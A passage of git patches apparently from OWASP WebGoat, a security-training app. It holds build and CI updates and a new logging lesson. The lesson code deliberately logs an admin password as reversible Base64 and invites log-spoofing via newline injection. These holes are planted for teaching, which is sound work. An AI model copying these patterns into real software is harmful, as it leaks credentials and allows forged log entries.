-java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --webgoat.build.version=$1 --server.address=0.0.0.0 > webwolf.log &
+java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --server.address=0.0.0.0 > webwolf.log &
 
 echo "Browse to http://localhost to get started" >> webgoat.log
 
-tail -300f webgoat.log
+exec tail -300f webgoat.log
diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java
index 30b2a153b..99396b122 100644
--- a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java
+++ b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java
@@ -50,26 +50,26 @@ public class StartWebGoat extends SpringBootServletInitializer {
     public static void main(String[] args) {
         log.info("Starting WebGoat with args: {}", StringUtils.arrayToCommaDelimitedString(args));
         System.setProperty("spring.config.name", "application-webgoat");
-       
-        String webgoatPort  = System.getenv("WEBGOAT_PORT");
-        String databasePort = System.getenv("WEBGOAT_HSQLPORT"); 
-        String webGoatHost = null==System.getenv("WEBGOAT_HOST")?"127.0.0.1":System.getenv("WEBGOAT_HOST");
-        int goatPort = webgoatPort == null?8080:Integer.parseInt(webgoatPort);
-        int dbPort = databasePort == null?9001:Integer.parseInt(databasePort);
-        
+
+        String webgoatPort = System.getenv("WEBGOAT_PORT");
+        String databasePort = System.getenv("WEBGOAT_HSQLPORT");
+        String webGoatHost = null == System.getenv("WEBGOAT_HOST") ? "127.0.0.1" : System.getenv("WEBGOAT_HOST");
+        int goatPort = webgoatPort == null ? 8080 : Integer.parseInt(webgoatPort);
+        int dbPort = databasePort == null ? 9001 : Integer.parseInt(databasePort);
+
         if (isAlreadyRunning(webGoatHost, goatPort)) {
-        	log.error("Port {}:{} is already in use", webGoatHost, goatPort);
-        	System.out.println("Port "+webGoatHost+":"+goatPort+" is in use. Use environment value WEBGOAT_PORT to set a different value.");
-        	System.exit(-1);
+            log.error("Port {}:{} is already in use", webGoatHost, goatPort);
+            System.out.println("Port " + webGoatHost + ":" + goatPort + " is in use. Use environment value WEBGOAT_PORT to set a different value.");
+            System.exit(-1);
         }
         if (isAlreadyRunning(webGoatHost, dbPort)) {
-        	log.error("Port {}:{} is already in use", webGoatHost, goatPort);
-        	System.out.println("Port "+webGoatHost+":"+goatPort+" is in use. Use environment value WEBGOAT_HSQLPORT to set a different value.");
-        	System.exit(-1);
+            log.error("Port {}:{} is already in use", webGoatHost, goatPort);
+            System.out.println("Port " + webGoatHost + ":" + goatPort + " is in use. Use environment value WEBGOAT_HSQLPORT to set a different value.");
+            System.exit(-1);
         }
         SpringApplication.run(StartWebGoat.class, args);
     }
-    
+
     private static boolean isAlreadyRunning(String host, int port) {
         try (var ignored = new Socket(host, port)) {
             return true;
diff --git a/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java b/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
index 1b045d45c..029268003 100644
--- a/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
+++ b/webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
@@ -26,10 +26,12 @@ import java.io.IOException;
 import java.net.Socket;
 
 import org.owasp.webwolf.requests.WebWolfTraceRepository;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Profile;
 
 @SpringBootApplication
 public class WebWolf {
@@ -42,22 +44,21 @@ public class WebWolf {
     public static void main(String[] args) {
         System.setProperty("spring.config.name", "application-webwolf");
 
-        String webwolfPort  = System.getenv("WEBWOLF_PORT");
-        String webGoatHost = null==System.getenv("WEBGOAT_HOST")?"127.0.0.1":System.getenv("WEBGOAT_HOST");
-        String webWolfHost = null==System.getenv("WEBWOLF_HOST")?"127.0.0.1":System.getenv("WEBWOLF_HOST");
+        String webwolfPort = System.getenv("WEBWOLF_PORT");
+        String webWolfHost = null == System.getenv("WEBWOLF_HOST") ? "127.0.0.1" : System.getenv("WEBWOLF_HOST");
         String fileEncoding = System.getProperty("file.encoding");
 
-        int wolfPort = webwolfPort == null?9090:Integer.parseInt(webwolfPort);
-        
-        if (null==fileEncoding || !fileEncoding.equals("UTF-8")) {
-        	System.out.println("It seems the application is startd on a OS with non default UTF-8 encoding:"+fileEncoding);
-        	System.out.println("Please add: -Dfile.encoding=UTF-8");
-        	System.exit(-1);
+        int wolfPort = webwolfPort == null ? 9090 : Integer.parseInt(webwolfPort);
+
+        if (null == fileEncoding || !fileEncoding.equals("UTF-8")) {
+            System.out.println("It seems the application is started on a OS with non default UTF-8 encoding:" + fileEncoding);
+            System.out.println("Please add: -Dfile.encoding=UTF-8");
+            System.exit(-1);
         }
 
-        if (isAlreadyRunning(webGoatHost, wolfPort)) {
-        	System.out.println("Port "+webWolfHost+":"+wolfPort+" is in use. Use environment value WEBWOLF_PORT to set a different value.");
-        	System.exit(-1);
+        if (isAlreadyRunning(webWolfHost, wolfPort)) {
+            System.out.println("Port " + webWolfHost + ":" + wolfPort + " is in use. Use environment value WEBWOLF_PORT to set a different value.");
+            System.exit(-1);
         }
         SpringApplication.run(WebWolf.class, args);
     }

From 76af488d163e24131d6d6d696e6ee7cfc0f2268c Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 12:57:01 +0200
Subject: [PATCH 074/227] Move Github actions to same image as Docker run on

---
 .github/workflows/branch_build.yml | 2 +-
 .github/workflows/pr_build.yml     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index efd8a34de..23b5f4d97 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -15,7 +15,7 @@ jobs:
       - name: set up JDK 16
         uses: actions/setup-java@v2
         with:
-          distribution: 'zulu'
+          distribution: 'temurin'
           java-version: 16
           architecture: x64
       - name: Cache Maven packages
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 358cf76b7..38ba4214a 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -33,7 +33,7 @@ jobs:
       - name: Set up JDK ${{ matrix.java }}
         uses: actions/setup-java@v2
         with:
-          distribution: 'zulu'
+          distribution: 'temurin'
           java-version: ${{ matrix.java }}
           architecture: x64
       - name: Cache Maven packages

From e709a501cb54d01c38d67ad03d975d74485b0b7f Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 13:12:48 +0200
Subject: [PATCH 075/227] Remove develop from branches to build The PR already
 works on a merge commit with develop no need to build it once more afterwards

---
 .github/workflows/pr_build.yml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 38ba4214a..8c31118f7 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -10,7 +10,6 @@ on:
   push:
     branches:
       - master
-      - develop
       - release/*
     tags-ignore:
       - '*'

From ad97e2c9a3ec9e5385258bf29492982b9e6f8aa8 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 13:30:21 +0200
Subject: [PATCH 076/227] Remove activation dependency

---
 webgoat-container/pom.xml | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml
index b6cdb2928..f8f81365c 100644
--- a/webgoat-container/pom.xml
+++ b/webgoat-container/pom.xml
@@ -48,11 +48,6 @@
                 </exclusion>
             </exclusions>
         </dependency>
-        <dependency>
-            <groupId>javax.activation</groupId>
-            <artifactId>activation</artifactId>
-            <version>${activation.version}</version>
-        </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-actuator</artifactId>

From 6a92f651f8f56c6d43bea35ffc52554e5c6ed4bb Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 14:03:28 +0200
Subject: [PATCH 077/227] Move to Java 17

---
 .github/workflows/branch_build.yml | 10 +++++-----
 .github/workflows/pr_build.yml     |  2 +-
 docker/Dockerfile                  |  2 +-
 pom.xml                            | 11 +++--------
 4 files changed, 10 insertions(+), 15 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 23b5f4d97..3cf875c61 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -12,11 +12,11 @@ jobs:
     name: "Package and linting"
     steps:
       - uses: actions/checkout@v2
-      - name: set up JDK 16
+      - name: set up JDK 17
         uses: actions/setup-java@v2
         with:
           distribution: 'temurin'
-          java-version: 16
+          java-version: 17
           architecture: x64
       - name: Cache Maven packages
         uses: actions/cache@v2.1.5
@@ -38,11 +38,11 @@ jobs:
           - mvn -pl webgoat-integration-tests test
     steps:
       - uses: actions/checkout@v2
-      - name: set up JDK 16
+      - name: set up JDK 17
         uses: actions/setup-java@v2
         with:
-          distribution: 'zulu'
-          java-version: 16
+          distribution: 'temurin'
+          java-version: 17
           architecture: x64
       - name: Cache Maven packages
         uses: actions/cache@v2.1.5
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 8c31118f7..1b50e0aa8 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -26,7 +26,7 @@ jobs:
     strategy:
       matrix:
         os: [ubuntu-latest, windows-latest, macos-latest]
-        java: [16]
+        java: [17]
     steps:
       - uses: actions/checkout@v2
       - name: Set up JDK ${{ matrix.java }}
diff --git a/docker/Dockerfile b/docker/Dockerfile
index fda1ab0aa..83fd7470d 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,4 +1,4 @@
-FROM eclipse-temurin:16.0.2_7-jdk-focal
+FROM eclipse-temurin:17_35-jdk-focal
 
 RUN apt-get update
 RUN useradd -ms /bin/bash webgoat
diff --git a/pom.xml b/pom.xml
index f0923b89a..5dcb91c7a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -19,10 +19,6 @@
     <inceptionYear>2006</inceptionYear>
     <url>https://github.com/WebGoat/WebGoat</url>
 
-    <prerequisites>
-        <maven>3.2.5</maven>
-    </prerequisites>
-
     <organization>
         <name>OWASP</name>
         <url>https://github.com/WebGoat/WebGoat/</url>
@@ -114,11 +110,10 @@
         <!-- Use UTF-8 Encoding -->
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
         <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
-        <maven.compiler.source>15</maven.compiler.source>
-        <maven.compiler.target>15</maven.compiler.target>
+        <maven.compiler.source>17</maven.compiler.source>
+        <maven.compiler.target>17</maven.compiler.target>
 
         <!-- Shared properties with plugins and version numbers across submodules-->
-        <activation.version>1.1.1</activation.version>
         <asciidoctorj.version>2.5.2</asciidoctorj.version>
         <commons-collections.version>3.2.1</commons-collections.version>
         <commons-lang3.version>3.12.0</commons-lang3.version>
@@ -132,7 +127,7 @@
         <maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version>
         <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
         <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
-        <java.version>15</java.version>
+        <java.version>17</java.version>
     </properties>
 
     <modules>

From 6a875bdaa67e321590f776547b15b8de97fe1c60 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 14:06:56 +0200
Subject: [PATCH 078/227] Add new developer

---
 pom.xml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/pom.xml b/pom.xml
index 5dcb91c7a..143eef96a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -56,6 +56,11 @@
             <name>René Zubcevic</name>
             <email>rene.zubcevic@owasp.org</email>
         </developer>
+        <developer>
+            <id>aolle</id>
+            <name>Àngel Ollé Blázquez</name>
+            <email>angel@olleb.com</email>
+        </developer>
         <developer>
             <id>jwayman</id>
             <name>Jeff Wayman</name>

From 36bdd9b1a0c1177b561d9c4f55e6c141e981baba Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 30 Oct 2021 22:45:18 +0200
Subject: [PATCH 079/227] Rename master to main

---
 .github/workflows/branch_build.yml | 2 +-
 .github/workflows/pr_build.yml     | 2 +-
 CREATE_RELEASE.MD                  | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 3cf875c61..ff1533f34 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -2,7 +2,7 @@ name: "Branch build"
 on:
   push:
     branches-ignore:
-      - master
+      - main
       - develop
       - release/*
 jobs:
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 1b50e0aa8..9823a87b2 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -9,7 +9,7 @@ on:
       - 'docs/**'
   push:
     branches:
-      - master
+      - main
       - release/*
     tags-ignore:
       - '*'
diff --git a/CREATE_RELEASE.MD b/CREATE_RELEASE.MD
index 1515aa3cd..9daf57065 100644
--- a/CREATE_RELEASE.MD
+++ b/CREATE_RELEASE.MD
@@ -23,7 +23,7 @@ git flow release publish
 
 git flow release finish <version>
 git push origin develop
-git push origin master
+git push origin main
 git push --tags
 ```
 

From 1a64fcd8d43811e94618031e9fbe2bca47b87572 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Tue, 16 Nov 2021 16:11:23 +0100
Subject: [PATCH 080/227] Recommit logging lesson as PR got a lot of conflicts

---
 webgoat-lessons/logging/pom.xml               | 25 +++++++
 .../webgoat/logging/LogBleedingTask.java      | 66 +++++++++++++++++++
 .../owasp/webgoat/logging/LogSpoofing.java    | 47 +++++++++++++
 .../webgoat/logging/LogSpoofingTask.java      | 51 ++++++++++++++
 .../src/main/resources/html/LogSpoofing.html  | 55 ++++++++++++++++
 .../resources/i18n/WebGoatLabels.properties   |  2 +
 .../lessonPlans/en/logReading_Task.adoc       |  5 ++
 .../lessonPlans/en/logSpoofing_Task.adoc      |  5 ++
 .../lessonPlans/en/logging_intro.adoc         | 13 ++++
 .../lessonPlans/en/more_logging.adoc          | 32 +++++++++
 .../en/sensitive_logging_intro.adoc           | 36 ++++++++++
 webgoat-lessons/pom.xml                       |  1 +
 12 files changed, 338 insertions(+)
 create mode 100755 webgoat-lessons/logging/pom.xml
 create mode 100644 webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java
 create mode 100644 webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java
 create mode 100644 webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java
 create mode 100755 webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html
 create mode 100755 webgoat-lessons/logging/src/main/resources/i18n/WebGoatLabels.properties
 create mode 100644 webgoat-lessons/logging/src/main/resources/lessonPlans/en/logReading_Task.adoc
 create mode 100755 webgoat-lessons/logging/src/main/resources/lessonPlans/en/logSpoofing_Task.adoc
 create mode 100755 webgoat-lessons/logging/src/main/resources/lessonPlans/en/logging_intro.adoc
 create mode 100644 webgoat-lessons/logging/src/main/resources/lessonPlans/en/more_logging.adoc
 create mode 100644 webgoat-lessons/logging/src/main/resources/lessonPlans/en/sensitive_logging_intro.adoc

diff --git a/webgoat-lessons/logging/pom.xml b/webgoat-lessons/logging/pom.xml
new file mode 100755
index 000000000..515b25f51
--- /dev/null
+++ b/webgoat-lessons/logging/pom.xml
@@ -0,0 +1,25 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <artifactId>logging</artifactId>
+    <packaging>jar</packaging>
+    <parent>
+        <groupId>org.owasp.webgoat.lesson</groupId>
+        <artifactId>webgoat-lessons-parent</artifactId>
+        <version>8.2.3-SNAPSHOT</version>
+    </parent>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.security</groupId>
+            <artifactId>spring-security-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+    </dependencies>
+
+</project>
diff --git a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java b/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java
new file mode 100644
index 000000000..3a0949218
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java
@@ -0,0 +1,66 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2019 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.logging;
+
+import org.apache.logging.log4j.util.Strings;
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.annotation.PostConstruct;
+import java.util.Base64;
+
+import java.nio.charset.StandardCharsets;
+import java.util.UUID;
+
+@RestController
+public class LogBleedingTask extends AssignmentEndpoint {
+
+    Logger log = LoggerFactory.getLogger(this.getClass().getName());
+    private String password;
+
+    @PostConstruct
+    public void generatePassword(){
+        password = UUID.randomUUID().toString();
+        log.info("Password for admin: {}", Base64.getEncoder().encodeToString(password.getBytes(StandardCharsets.UTF_8)));
+    }
+
+    @PostMapping("/LogSpoofing/log-bleeding")
+    @ResponseBody
+    public AttackResult completed(@RequestParam String username, @RequestParam String password) {
+        if (Strings.isEmpty(username) || Strings.isEmpty(password)) {
+            return failed(this).output("Please provide username (Admin) and password").build();
+        }
+
+        if (username.equals("Admin") && password.equals(this.password)) {
+            return success(this).build();
+        }
+
+        return failed(this).build();
+    }
+}
diff --git a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java b/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java
new file mode 100644
index 000000000..ccf32eae6
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java
@@ -0,0 +1,47 @@
+package org.owasp.webgoat.logging;
+
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.Lesson;
+import org.springframework.stereotype.Component;
+
+/**
+ * ************************************************************************************************
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ * <p>
+ * Copyright (c) 2002 - 2014 Bruce Mayhew
+ * <p>
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ * <p>
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ * <p>
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ * <p>
+ * Getting Source ==============
+ * <p>
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
+ * projects.
+ * <p>
+ *
+ * @author WebGoat
+ * @version $Id: $Id
+ * @since October 12, 2016
+ */
+@Component
+public class LogSpoofing extends Lesson {
+    @Override
+    public Category getDefaultCategory() {
+        return Category.INSECURE_CONFIGURATION;
+    }
+
+    @Override
+    public String getTitle() {
+        return "logging.title";
+    }
+}
diff --git a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java b/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java
new file mode 100644
index 000000000..193a5ab73
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java
@@ -0,0 +1,51 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2019 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.logging;
+
+import org.apache.logging.log4j.util.Strings;
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class LogSpoofingTask extends AssignmentEndpoint {
+
+    @PostMapping("/LogSpoofing/log-spoofing")
+    @ResponseBody
+    public AttackResult completed(@RequestParam String username, @RequestParam String password) {
+        if (Strings.isEmpty(username)) {
+            return failed(this).output(username).build();
+        }
+        username = username.replace("\n", "<br/>");
+        if (username.contains("<p>") || username.contains("<div>")) {
+            return failed(this).output("Try to think of something simple ").build();
+        }
+        if (username.indexOf("<br/>") < username.indexOf("admin")) {
+            return success(this).output(username).build();
+        }
+        return failed(this).output(username).build();
+    }
+}
diff --git a/webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html b/webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html
new file mode 100755
index 000000000..50907ad78
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/html/LogSpoofing.html
@@ -0,0 +1,55 @@
+<!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+<div class="lesson-page-wrapper">
+    <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+    <!-- include content here. Content will be presented via asciidocs files,
+    which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+    <div class="adoc-content" th:replace="doc:logging_intro.adoc"></div>
+</div>
+
+<div class="lesson-page-wrapper">
+    <!-- stripped down without extra comments -->
+    <div class="adoc-content" th:replace="doc:logSpoofing_Task.adoc"></div>
+    <div class="attack-container">
+        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+        <form class="attack-form" accept-charset="UNKNOWN" name="task"
+              method="POST"
+              action="/WebGoat/LogSpoofing/log-spoofing">
+
+            <input type="text" value="" name="username" placeholder="username"/>
+            <input type="password" value="" name="password" placeholder="password"/>
+            <input type="submit" value="Submit"/>
+
+        </form>
+        <div class="attack-feedback"></div>
+        Log output:
+        <div style="background-color:red;color:white;">Login failed for username:<p class="attack-output"
+                                                                                    style="display:inline;"></p></div>
+    </div>
+</div>
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:sensitive_logging_intro.adoc"></div>
+</div>
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:logReading_Task.adoc"></div>
+    <div class="attack-container">
+        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+        <form class="attack-form" accept-charset="UNKNOWN" name="task"
+              method="POST"
+              action="/WebGoat/LogSpoofing/log-bleeding">
+
+            <input type="text" value="" name="username" placeholder="username"/>
+            <input type="password" value="" name="password" placeholder="password"/>
+            <input type="submit" value="Submit"/>
+
+        </form>
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
+    </div>
+</div>
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:more_logging.adoc"></div>
+</div>
+</html>
diff --git a/webgoat-lessons/logging/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/logging/src/main/resources/i18n/WebGoatLabels.properties
new file mode 100755
index 000000000..3bb38d82c
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/i18n/WebGoatLabels.properties
@@ -0,0 +1,2 @@
+logging.title=Logging Security
+
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logReading_Task.adoc b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logReading_Task.adoc
new file mode 100644
index 000000000..bbff01af7
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logReading_Task.adoc
@@ -0,0 +1,5 @@
+=== Let's try
+
+- Some servers provide Administrator credentials at the boot-up of the server.
+- The goal of this challenge is to find the secret in the application log of the WebGoat server to login as the Admin user.
+- Note that we tried to "protect" it. Can you decode it?
\ No newline at end of file
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logSpoofing_Task.adoc b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logSpoofing_Task.adoc
new file mode 100755
index 000000000..c1d11a2bc
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logSpoofing_Task.adoc
@@ -0,0 +1,5 @@
+=== Let's try
+
+- The goal of this challenge is to make it look like username "admin" succeeded in logging in.
+- The red area below shows what will be logged in the web server's log file.
+- Want to go beyond? Try to elevate your attack by adding a script to the log file.
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logging_intro.adoc b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logging_intro.adoc
new file mode 100755
index 000000000..3e35bf96e
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/logging_intro.adoc
@@ -0,0 +1,13 @@
+
+== Concept
+Logging is very important for modern systems. We use it for various reasons:
+
+- Application monitoring and debugging.
+- Audit logging: E.g. record specific actions of your users and systems.
+- Security Event Monitoring: e.g. provide information to a SIEM or SOAR system that will trigger based on the information provided in these logs.
+
+== Goals
+* The user should have a basic understanding of logging and where to log for.
+* The user understands the risks of log spoofing and leaking log information.
+* The user will be able to do a simple log spoofing attack.
+* The user will be able to tell the basic risks involved in logging.
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/more_logging.adoc b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/more_logging.adoc
new file mode 100644
index 000000000..e33639908
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/more_logging.adoc
@@ -0,0 +1,32 @@
+=== More About Logging (2)
+
+By now it should be clear that using simple encoding/decoding is not a way to protect sensitive information in a log. Instead, it is better to use different techniques: not logging the data at all, blanking it out, or encrypting it with another shared secret.
+
+There are a few more topics we might want to cover here:
+
+- How to work with log-levels
+- How to do Exception Handling
+- How to use logging for other purposes
+- Some resources to read up on.
+
+==== Log Levels
+Explain log levels
+
+==== Exception Handling
+ exception handling (maybe an example of logging exception towards the client with cryptography and why this is a bad idea)
+
+
+==== Audit Logging, Security Event Monitoring, and Application Logs
+Note that logging is often used for more than just application debugging. Application logs are often used as a feed for other purposes, think of:
+
+ - *Audit logging*: Specific events need to be recorded by your application log to create a trail that can be used to reconstruct the actions done on behalf of/by your user. This can later be used, for instance, in court to prove what happened in case of a dispute.
+ - *Security Event Monitoring (SEM)*: Events generated by your application can often be used by your security department to understand what is going on in the application landscape of the organization. There are various types of events as well as various attributes that can play a role to detect whether the organization is in trouble. For instance: a privileged administrative logon that is only used as a break-glass procedure can already be a very valuable event for them. Another example: While frequently used administrative logons are good to record, they might not trigger an event at the security department by themselves, unless a completely different location is used for that administrative role. A threat model exercise with your security department can often help to understand which types of logs they require, and what they should trigger a security alert on immediately.
+ - *Fraud Detection*: your application logs can help in fraud detection. For instance: logs that show that someone is trying to move around more money than that they have, could indicate something is going wrong.
+ - *Business Process Monitoring*: your application logs can be used to see if the business processes are still progressing as they should. For instance: the lack of new events further down a process could indicate that the business process has stopped. This can be valuable information to the business when it comes to steering the company.
+ - *And many more*...
+
+Note that a lot of these logging purposes differ quite a lot from each other! Therefore it is best to separate your application (debug) logging, from your SEM, and audit logs in terms of output by your application, storage and processing of the logs within your organization.
+
+==== More reading
+
